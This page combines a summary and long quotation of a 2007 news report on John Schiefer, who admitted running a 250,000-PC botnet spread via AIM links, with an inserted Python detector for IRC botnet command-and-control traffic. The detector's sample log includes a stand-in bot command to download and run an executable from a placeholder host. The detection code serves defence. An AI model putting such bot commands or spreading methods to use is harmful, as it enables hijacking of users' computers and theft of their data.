John Schiefer, 26, from Los Angeles in the United States, is known online as "acid" or "acidstorm".
Not long ago he admitted to the authorities and the media that he ran a botnet of more than 250,000 computers. He administered two IRC chat rooms, "#bottalk" and "#rizon", and used his botnet to steal users' account names, passwords, credit card numbers and similar data. John said he expanded the botnet mainly by exploiting AIM (AOL Instant Messenger): he sent links to target users and tricked them into clicking, after which bot software or a Trojan was downloaded onto their computers and lay dormant there.
John previously worked at 3G Communications, a Los Angeles Internet telephony company, where his main job was providing security protection for the company's business customers. Because of John's position, the report prompted a great deal of discussion: can professional security consultants be trusted? What are they all doing?
Report from Networks Asia:
http://www.networksasia.net/article.php?type=article&id_article=2425
Another report, from The Washington Post:
http://blog.washingtonpost.com/securityfix/2007/11/security_pro_admits_to_hijacki.html?nav=rss_blog
Security Pro Admits to Hijacking PCs for Profit
A Los Angeles security professional has admitted to infecting more than a quarter million computers with malicious software and installing spyware that was used to steal personal data and serve victims with online advertisements.
John Kenneth Schiefer, 26, variously known online as "acid" and "acidstorm," agreed to plead guilty to at least four felony charges of fraud and wiretapping, charges punishable by $1.75 million in fines and nearly 60 years in prison.
Investigators say Schiefer and two minors, identified in the complaint only by their online screen names "pr1me" and "dynamic," broke into about 250,000 PCs. On at least 137,000 of those infected systems, Schiefer and his cohorts installed programs that allowed them to control the machines remotely. The malicious "bot" programs also allowed the attackers to steal any user names and passwords that victims had saved in Internet Explorer.
Schiefer is thought to be the first in the United States to be accused of violating federal wiretapping laws by operating a "botnet," the term for a large grouping of hacked, remotely controlled computers, according to Mark Krause, an assistant U.S. attorney in Los Angeles.
In an exclusive interview with Security Fix, Schiefer said he's been experimenting with computers and writing software in one form or another since 1991, when he first discovered Internet relay chat (IRC), a vast sea of text-based communications networks that predates instant-messaging software. There are tens of thousands of IRC channels all over the world catering to almost every imaginable audience or interest, including quite a few frequented exclusively by hackers, virus writers and loose-knit criminal groups. IRC channels have traditionally been among the most popular means of controlling botnets.
For the past several years, Schiefer has acted as an administrator for "#bottalk" and "#rizon," two of the more active hacker chat rooms on IRC, where the discussion ranges from pop culture to methods for improving the latest bot programs and identifying which Web sites most recently got hacked.
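The two paragraphs above describe the classic IRC command-and-control pattern: bots join a channel and wait for an operator to type a command that every bot receives at once. The following detector, an added example and not code from the article or from anyone it names, shows what that pattern looks like in traffic. It assumes a sensor that logs each IRC line as "<client_ip> <direction> <raw IRC message>" (">" client to server, "<" server to client); the log lines, channel names, nicks and the "!update" command in SAMPLE_LOG are constructed for illustration, and the bracketed nick pattern is an assumption about how herders name bots, not a fact from the article.

```python
"""
Heuristic detector for IRC botnet command-and-control traffic.

Added example, not code from the article. Assumed log format:
"<client_ip> <direction> <raw IRC message>", where ">" is client-to-server
and "<" is server-to-client. SAMPLE_LOG is constructed sample data.

Two signals that separate a herder's channel from ordinary chat:
  1. many distinct client hosts join the same channel using machine-
     generated nicks of the (assumed) form [REGION|OS|number];
  2. one sender's identical PRIVMSG is fanned out to all of those hosts.
"""
import re
from collections import defaultdict

# Constructed sample: three bots joining one channel and receiving the
# same command, plus one human in an unrelated channel as a control.
SAMPLE_LOG = """\
10.0.0.11 > NICK [USA|XP|4821]
10.0.0.11 > JOIN #bottalk
10.0.0.12 > NICK [USA|XP|1930]
10.0.0.12 > JOIN #bottalk
10.0.0.13 > NICK [DEU|2K|7714]
10.0.0.13 > JOIN #bottalk
10.0.0.11 < :herder!~h@c2.example PRIVMSG #bottalk :!update http://dl.example/x.exe
10.0.0.12 < :herder!~h@c2.example PRIVMSG #bottalk :!update http://dl.example/x.exe
10.0.0.13 < :herder!~h@c2.example PRIVMSG #bottalk :!update http://dl.example/x.exe
10.0.0.50 > NICK alice
10.0.0.50 > JOIN #python
10.0.0.50 < :bob!~b@home.example PRIVMSG #python :anyone tried the new asyncio API?
"""

LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<dir>[<>]) (?P<msg>.*)$")
NICK_RE = re.compile(r"^NICK (?P<nick>\S+)$")
JOIN_RE = re.compile(r"^JOIN (?P<chan>#\S+)$")
PRIVMSG_RE = re.compile(r"^:(?P<sender>[^!\s]+)\S* PRIVMSG (?P<chan>#\S+) :(?P<text>.*)$")
# Assumed machine-generated bot nick, e.g. [USA|XP|4821]: region|OS|random id.
BOT_NICK_RE = re.compile(r"^\[[A-Z]{2,3}\|[A-Z0-9]+\|\d+\]$")


def parse_log(text):
    """Yield (client_ip, direction, irc_message) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["ip"], m["dir"], m["msg"]


def detect_c2_channels(text, min_hosts=3):
    """Return {channel: finding} for channels that look like bot C2.

    A channel is reported when at least min_hosts client hosts joined it
    and either (a) some of those hosts use machine-generated nicks or
    (b) a single sender's identical message reached at least min_hosts
    of them (the fan-out that a herder's command produces).
    """
    members = defaultdict(set)                        # chan -> client ips
    nick_of = {}                                      # ip -> last NICK
    fanout = defaultdict(lambda: defaultdict(set))    # chan -> (sender, text) -> ips
    for ip, direction, msg in parse_log(text):
        if direction == ">":
            if m := NICK_RE.match(msg):
                nick_of[ip] = m["nick"]
            elif m := JOIN_RE.match(msg):
                members[m["chan"]].add(ip)
        elif m := PRIVMSG_RE.match(msg):
            fanout[m["chan"]][(m["sender"], m["text"])].add(ip)

    findings = {}
    for chan, hosts in members.items():
        if len(hosts) < min_hosts:
            continue
        bot_nick_hosts = {ip for ip in hosts if BOT_NICK_RE.match(nick_of.get(ip, ""))}
        broadcasts = [
            (sender, txt, len(ips & hosts))
            for (sender, txt), ips in fanout[chan].items()
            if len(ips & hosts) >= min_hosts
        ]
        if bot_nick_hosts or broadcasts:
            findings[chan] = {
                "hosts": sorted(hosts),
                "bot_nick_hosts": sorted(bot_nick_hosts),
                "broadcast_commands": broadcasts,
                "operators": sorted({s for s, _, _ in broadcasts}),
            }
    return findings


if __name__ == "__main__":
    for chan, f in detect_c2_channels(SAMPLE_LOG).items():
        print(chan, "hosts:", len(f["hosts"]), "operators:", f["operators"])
        for sender, txt, n in f["broadcast_commands"]:
            print(f"  {sender} -> {n} hosts: {txt}")
```

On the constructed sample the detector reports only #bottalk, with all three hosts flagged by nick pattern and one command from "herder" fanned out to all three; #python has a single member and is ignored. The fan-out signal is the more robust of the two, since nick formats change per bot family while the one-to-many command delivery is intrinsic to using a channel as C2.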
Schiefer said he and his friends spread the bot programs mainly over AOL Instant Messenger (AIM). By using malicious "spreader" programs such as Niteaim and AIM Exploiter, Schiefer and his co-conspirators spammed out messages inviting recipients to click on a link. Anyone who took the bait had a "Trojan horse" program downloaded to their machine, an invader that then tried to fetch the malicious bot program.
Schiefer admits he and friends used several hijacked PayPal accounts to purchase Web hosting that helped facilitate the spreading of their bot programs.
Schiefer's employer, Los Angeles-based Internet telephony provider 3G Communications, let him go in March 2006 after he filed a series of disability claims. His job at the time was to help secure communications networks for businesses.
Schiefer claims that he stopped all of the malicious activity in early January 2006.
"Ever since then, I've been more trying to create a positive thing and trying to prevent crap like this happening," he said. "I kind of saw the error of my ways and decided I'd had enough."
Later that month, federal agents raided his home, seizing computer equipment and other evidence.
Schiefer also said he had installed adware on machines he and his friends controlled, making a 20 cent commission each time they installed a piece of software from TopConverting, a now defunct adware company formerly owned by Simpel Internet, a marketing company based in the Netherlands.
Schiefer acknowledged that in mid-2005, he made more than $19,000 in commissions from TopConverting by installing its software on hijacked computers. The government claims he made the money installing adware over a period of a month in June 2005. Schiefer said he earned that sum in less than one week's time.
Schiefer admitted that he spent most of that week's earnings the following month entertaining himself and friends at DefCon, a massive hacker and security research conference held annually in Las Vegas.
Interestingly, I featured TopConverting in a February 2006 story I wrote for The Washington Post Magazine, which chronicled the exploits of "0x80," a hacker who, like Schiefer, made thousands of dollars a month installing adware on machines he had seeded with bot programs.
From that story: "Majy says TopConverting, which did not respond to requests for comment for this article, paid him an average of $2,400 every two weeks for installing its programs. He got 20 cents per install for computers in the United States and five cents per install for PCs in 16 other countries, including France, Germany and the United Kingdom. A nickel per install doesn't sound like much, unless you control a botnet of tens of thousands of computers."
According to an FBI informant who asked not to be named, Schiefer was a member of Defonic, a hacker group that included the individuals identified in the paragraph above as Zach "Majy" Mann, as well as "0x80". Another member of Defonic, Cameron "cam0" LaCroix, earned his reputation after breaking into Paris Hilton's cell phone account and later leading the group in breaching data giant LexisNexis, a stunt in which cam0 and several others pulled sensitive records on more than 310,000 people, including a number of Hollywood celebrities.
Most former members of the Defonic crew are now either in jail or have only recently been released from prison.
Schiefer said he regrets his actions, and hopes that the cooperation he has shown with law enforcement in the case so far will lighten his sentence.
“I don’t think anyone should feel sorry for me,” Schiefer said. “What I was doing was wrong [and] stupid, and I got caught.”